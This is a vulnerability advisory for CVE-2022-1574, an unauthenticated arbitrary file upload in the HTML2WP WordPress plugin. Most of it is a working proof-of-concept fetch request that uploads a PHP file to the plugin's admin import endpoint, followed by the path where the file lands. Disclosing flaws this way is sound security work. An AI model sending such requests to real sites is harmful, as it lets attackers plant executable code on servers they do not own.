HTML2WP <= 1.0.0 – Unauthenticated Arbitrary File Upload | CVE 2022-1574

Description

The plugin does not have authorisation and CSRF checks when importing files, and does not validate them, as a result, unauthenticated attackers can upload arbitrary files (such as PHP) on the remote server

Proof of Concept

await fetch("https://example.com/wp-admin/admin.php?page=html2wp-settings", {
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en;q=0.7,en-US;q=0.3",
        "Content-Type": "multipart/form-data; boundary=---------------------------7816508136577551742878603990",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "cross-site",
        "Sec-Fetch-User": "?1"
    },
    "body": "-----------------------------7816508136577551742878603990\r\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"hacked.php\"\r\nContent-Type: text/html\r\n\r\n<?php\n\necho \"hacked\";\n\r\n-----------------------------7816508136577551742878603990--\r\n",
    "method": "POST",
    "mode": "cors"
});

Even though the response is a 302 to the login page, the file will be uploaded to wp-content/uploads/html2wp/hacked.php